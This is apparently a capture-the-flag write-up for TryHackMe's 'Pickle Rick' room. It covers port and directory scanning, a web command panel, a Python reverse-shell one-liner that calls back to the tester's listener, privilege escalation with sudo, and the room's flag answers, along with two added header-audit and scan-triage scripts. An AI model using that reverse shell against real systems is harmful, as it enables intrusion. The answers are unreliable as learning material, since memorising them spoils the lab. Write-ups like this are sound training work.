TryHackMe Pickle Rick room
Pickle Rick is a room on TryHackMe. It's a free room; anybody can deploy the machine and have fun.
A complete guide to solving the room
The IP address I got was 10.10.40.75.
Then I started an nmap scan of that IP; here are the results.
Command I used to scan the machine (you can add -vv for more verbose output):
nmap -sC -sV 10.10.40.75
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 16:17 IST
Nmap scan report for 10.10.40.75
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:52:73:f2:7c:50:d5:0b:61:6f:ef:e8:ce:7c:02:ed (RSA)
| 256 87:c5:3b:8a:dc:29:c7:66:8c:46:59:8f:58:da:3b:fc (ECDSA)
|_ 256 3b:a3:4f:b5:bb:69:7a:03:7e:98:7a:e8:0f:c0:fb:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.38 seconds
Okay, from the scan we learned that the machine is running a web server (Apache on port 80).
So from there I ran gobuster and nikto scans against the machine.
Firstly, the nikto scan.
Command used: nikto -h 10.10.40.75
Results are as follows:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.40.75
+ Target Hostname: 10.10.40.75
+ Target Port: 80
+ Start Time: 2021-04-08 16:39:05 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
Not much, but we got a login page at /login.php.
Next, gobuster.
Command: gobuster dir --url http://10.10.40.75 -w /usr/share/dirb/wordlists/common.txt
You can select any wordlist you want.
Result:
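Nikto's findings above (no X-Frame-Options, no X-Content-Type-Options, no XSS-related header, PHPSESSID without HttpOnly, a version-revealing Server header) are the kind of thing the owner of a host like this would want to check before a scanner does. The script below is an added example, not part of the original writeup: it parses a raw HTTP response head and reports those weaknesses. Both responses in it are constructed; the first imitates what nikto saw, the second is the hardened shape a defender would aim for.

```python
"""Audit an HTTP response head for the header weaknesses nikto reports.

Added example, not part of the original writeup. WEAK_RESPONSE and
HARDENED_RESPONSE are constructed samples, not captures from the room.
"""
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (severity, message)


def parse_head(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response into its status line and (name, value) pairs.

    Names are lower-cased; repeated headers such as Set-Cookie are kept
    as separate entries so every cookie is audited on its own.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit_headers(headers: List[Tuple[str, str]]) -> List[Finding]:
    """Return findings for the weaknesses nikto flagged on this host."""
    present: Dict[str, List[str]] = {}
    for name, value in headers:
        present.setdefault(name, []).append(value)
    findings: List[Finding] = []

    csp = " ".join(present.get("content-security-policy", []))
    # Clickjacking: either X-Frame-Options or a CSP frame-ancestors directive will do.
    if "x-frame-options" not in present and "frame-ancestors" not in csp:
        findings.append(("medium", "no clickjacking protection: set X-Frame-Options or CSP frame-ancestors"))
    if "nosniff" not in [v.lower() for v in present.get("x-content-type-options", [])]:
        findings.append(("low", "X-Content-Type-Options: nosniff missing"))
    # X-XSS-Protection (the header nikto mentions) is deprecated; CSP is the replacement.
    if not csp:
        findings.append(("low", "no Content-Security-Policy"))
    for cookie in present.get("set-cookie", []):
        cookie_name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(("medium", f"cookie {cookie_name} set without HttpOnly"))
        if "secure" not in attrs:
            findings.append(("low", f"cookie {cookie_name} set without Secure"))
    for server in present.get("server", []):
        # "Apache/2.4.18" reveals a version; "Apache" alone does not.
        if re.search(r"/\d", server):
            findings.append(("info", f"Server header leaks a version: {server}"))
    return findings


def audit_response(raw: str) -> List[Finding]:
    return audit_headers(parse_head(raw)[1])


WEAK_RESPONSE = (  # constructed to resemble the nikto findings above
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    "Set-Cookie: PHPSESSID=deadbeef; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

HARDENED_RESPONSE = (  # constructed: the same page with the fixes applied
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=deadbeef; Path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"== {label} ==")
        for sev, msg in audit_response(raw) or [("ok", "no findings")]:
            print(f"[{sev}] {msg}")
```

Running it prints six findings for the weak response and none for the hardened one; to audit a real response, paste the head your server returns (for example from curl -i) into the raw string.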
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.75
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/04/08 16:29:28 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 290]
/.htpasswd (Status: 403) [Size: 295]
/.htaccess (Status: 403) [Size: 295]
/assets (Status: 301) [Size: 311] [--> http://10.10.40.75/assets/]
/index.html (Status: 200) [Size: 1062]
/robots.txt (Status: 200) [Size: 17]
/server-status (Status: 403) [Size: 299]
===============================================================
2021/04/08 16:32:17 Finished
Huh! We got robots.txt.
Okay, let's try again with the -x flag.
-x appends the given extensions to every word, so we also look for php and sh files.
Command: gobuster dir --url http://10.10.40.75 -w /usr/share/dirb/wordlists/common.txt -x php,sh
Result:
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.75
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,sh
[+] Timeout: 10s
===============================================================
2021/04/08 16:45:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 290]
/.hta.php (Status: 403) [Size: 294]
/.htaccess.sh (Status: 403) [Size: 298]
/.hta.sh (Status: 403) [Size: 293]
/.htpasswd (Status: 403) [Size: 295]
/.htaccess.php (Status: 403) [Size: 299]
/.htpasswd.php (Status: 403) [Size: 299]
/.htaccess (Status: 403) [Size: 295]
/.htpasswd.sh (Status: 403) [Size: 298]
/assets (Status: 301) [Size: 311] [--> http://10.10.40.75/assets/]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
/server-status (Status: 403) [Size: 299]
===============================================================
2021/04/08 16:53:50 Finished
===============================================================
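Reading a gobuster run by hand gets tedious once the list is long. The script below is an added example (not from the original writeup) that parses gobuster's directory-mode lines into records and groups them the way a reviewer of their own host would read them: what is served to anyone, what redirects to a login page (an authenticated area), what the server refuses, and which directories redirect. SAMPLE_OUTPUT is a copy of the result lines from the second run above; the grouping labels are my own.

```python
"""Parse gobuster directory-mode output and triage the hits.

Added example, not part of the original writeup. SAMPLE_OUTPUT copies the
result lines of the second gobuster run in the writeup.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional


class Hit(NamedTuple):
    path: str
    status: int
    size: int
    redirect: Optional[str]


# One result line: "/path (Status: NNN) [Size: N] [--> target]"; the redirect part is optional.
LINE_RE = re.compile(
    r"^(?P<path>/\S*)\s+\(Status:\s*(?P<status>\d{3})\)\s*"
    r"\[Size:\s*(?P<size>\d+)\](?:\s*\[-->\s*(?P<redirect>\S+)\])?\s*$"
)


def parse_gobuster(text: str) -> List[Hit]:
    """Return a Hit for every result line; banner and progress lines are skipped."""
    hits: List[Hit] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            hits.append(Hit(m["path"], int(m["status"]), int(m["size"]), m["redirect"]))
    return hits


def triage(hits: List[Hit]) -> Dict[str, List[str]]:
    """Group hits by what they mean to the site owner.

    reachable:  200, content served to anyone
    auth_gated: 302 to a login page, i.e. an authenticated area exists
    blocked:    403, the web server refused (dotfiles, server-status)
    listing:    301 onto a directory; check that indexing is off
    """
    groups: Dict[str, List[str]] = defaultdict(list)
    for h in hits:
        if h.status == 200:
            groups["reachable"].append(h.path)
        elif h.status == 302 and h.redirect and "login" in h.redirect:
            groups["auth_gated"].append(h.path)
        elif h.status == 403:
            groups["blocked"].append(h.path)
        elif h.status == 301:
            groups["listing"].append(h.path)
        else:
            groups["other"].append(h.path)
    return dict(groups)


SAMPLE_OUTPUT = """\
===============================================================
/.hta (Status: 403) [Size: 290]
/.hta.php (Status: 403) [Size: 294]
/.htaccess.sh (Status: 403) [Size: 298]
/.hta.sh (Status: 403) [Size: 293]
/.htpasswd (Status: 403) [Size: 295]
/.htaccess.php (Status: 403) [Size: 299]
/.htpasswd.php (Status: 403) [Size: 299]
/.htaccess (Status: 403) [Size: 295]
/.htpasswd.sh (Status: 403) [Size: 298]
/assets (Status: 301) [Size: 311] [--> http://10.10.40.75/assets/]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
/server-status (Status: 403) [Size: 299]
===============================================================
2021/04/08 16:53:50 Finished
"""

if __name__ == "__main__":
    for group, paths in triage(parse_gobuster(SAMPLE_OUTPUT)).items():
        print(f"{group:>10}: {', '.join(paths)}")
```

On the sample this puts denied.php and portal.php under auth_gated, which is exactly the pair the writeup goes on to look at; the ten 403s are the server correctly refusing dotfiles and server-status.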
Oh bruh!!
We got portal.php, and here we have a command panel.
Starting with the basic command ls.
Result:
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
Let's navigate to http://10.10.40.75/Sup3rS3cretPickl3Ingred.txt
Oh ho, we got the first flag, baby.
#TASK 1
What is the first ingredient Rick needs?
mr. meeseek hair
Next, I navigated to http://10.10.40.75/clue.txt, which says:
Look around the file system for the other ingredient.
Trying to get a reverse shell.
With python3 we can get a reverse shell.
You can get the reverse shell script from the pentestmonkey site,
but here we can use the following one-liner:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.235.199",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And start a listener on our machine to capture the shell; it's a very simple command: nc -lnvp 4444
We got a shell.
sudo bash
And we are root, and you can get all your flags.
Commands used to reach the flag:
cd /home
ls
rick
ubuntu
cd rick
ls
second ingredients
cat *   # to open the file
1 jerry tear
#TASK 2
What is the second ingredient Rick needs?
1 jerry tear
#TASK 3
What is the third ingredient Rick needs?
fleeb juice